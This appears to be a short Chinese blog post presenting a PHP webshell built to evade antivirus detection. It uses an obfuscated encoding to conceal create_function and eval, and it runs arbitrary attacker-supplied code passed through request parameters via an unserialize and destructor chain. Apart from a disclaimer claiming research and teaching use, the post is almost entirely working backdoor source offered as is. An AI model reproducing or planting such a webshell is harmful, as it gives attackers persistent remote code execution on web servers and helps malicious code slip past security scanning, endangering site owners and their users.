php 免杀
<?php
class facai{
var $text = "";
var $func;
public function setText($text){
$this->text=$text;
}
public function __destruct()
{
$this->poc($this->text);
}
function encode($string = '', $skey = 'wenzi') {
$strArr = str_split(base64_encode($string));
$strCount = count($strArr);
foreach (str_split($skey) as $key => $value){
$key < $strCount && $strArr[$key].=$value;
}
return str_replace(array('=', '+', '/'), array('O0O0O', 'o000o', 'oo00o'), join('', $strArr));
}
static function decode($string = '', $skey = 'wenzi') {
$strArr = str_split(str_replace(array('O0O0O', 'o000o', 'oo00o'), array('=', '+', '/'), $string), 2);
$strCount = count($strArr);
foreach (str_split($skey) as $key => $value){
$key <= $strCount && $strArr[$key][1] === $value && $strArr[$key] = $strArr[$key][0];
}
return base64_decode(join('', $strArr));
}
public function poc($text){
$a = 1+2;
$funcName='Yw3eJnlzYiXRlX2Z1bmN0aW9u';
$code = 'ZwXeZnhzbiCgkYS4nJyk7';
$func = call_user_func($this->decode($funcName),'$a',$this->decode($code));
$func($text);
}
}
extract($_REQUEST);
$len = strlen($data);
$ClassText = 'O:5:"facai":1:{s:4:"text";s:'.$len.':"'.$data.'";}';
unserialize($ClassText);
权声明:
作者:ucpeo
链接: Blog
来源:Blog
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论